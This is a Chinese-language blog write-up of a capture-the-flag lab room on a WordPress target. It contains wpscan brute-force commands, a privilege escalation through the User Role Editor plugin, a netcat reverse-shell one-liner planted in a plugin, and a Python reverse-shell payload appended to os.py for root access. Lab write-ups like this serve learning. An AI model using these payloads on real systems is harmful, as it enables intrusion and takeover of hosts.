noone___'s blog

阿西吧怎么党课和青马班一块来啊，忙死了

蓝队溯源怎么能叫开盒呢

• 扫描打点

  

  

  没扫到什么有价值的

  • 80

    扫出来有 /admin ，看一下是 wp 的站：

    

    1	wpscan --url http://jack.thm -e u

    扫出来三个人 jack wendy danny

    再爆破一下：

    1	wpscan --url http://jack.thm/wp-login.php -U user.txt -P /usr/share/wordlists/fasttrack.txt

    令人感慨的是 rockyou.txt 里面没有这个密码

    爆出来账密 wendy:changelater

• wordpress 拿 rce

  进去后右下角看到版本 5.3.2

  但这个内核没洞，看提示说的是 ure_other_roles ，查了一下 ure 是 wp 的插件 User Role Editor，有一个用户提权的洞

  根据描述是去 profile.php 点 upadte profile ，在 POST 请求里面加上 ure_other_roles 参数，值为 administrator

  看到提到 admin 了：

  

  看到可以修改插件内容，在 plugin editor 里面随便改一个反弹 shell

  

  1	mkfifo /tmp/f;nc 10.0.127.37 4444 < /tmp/f | /bin/bash > /tmp/f

• var/backup 备份横向

  在 jack 的家目录找到第一个 flag ，以及提示：

  

  那就是去 /var/backup 找备份文件，看到 id_rsa 下下来登录：

  

  横向到 jack ，但没有密码执行不了 sudo

• 提权

  看了一圈没什么，传个 pspy 扫一下

  扫到

  

  然后不让用路径劫持了：

  

  偷看一下，发现这里可以更改 os.py 。。。

  在 /usr/lib/python2.7/os.py

  手动加一段反弹 shell 即可

  1 2 3 4 5 6 7 8

  echo 'import socket import pty s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.127.37",8888)) dup2(s.fileno(),0) dup2(s.fileno(),1) dup2(s.fileno(),2) pty.spawn("/bin/bash")'>>os.py

德不配位（大雾，很难想象这个房间跟redteam capstone是一个难度的

系统学下linux提权基础

口牙是DC，快退啊，欸只有DC

“所看见的并非如此”，我的评价是这靶机出的有点刻晴了

数据外泄，学一下

克制一下，不要老想着用21年的CVE打20年的房间

~~天才猫猫头发现了懒狗办法~~有狗在拿21年的CVE爆切20年的房间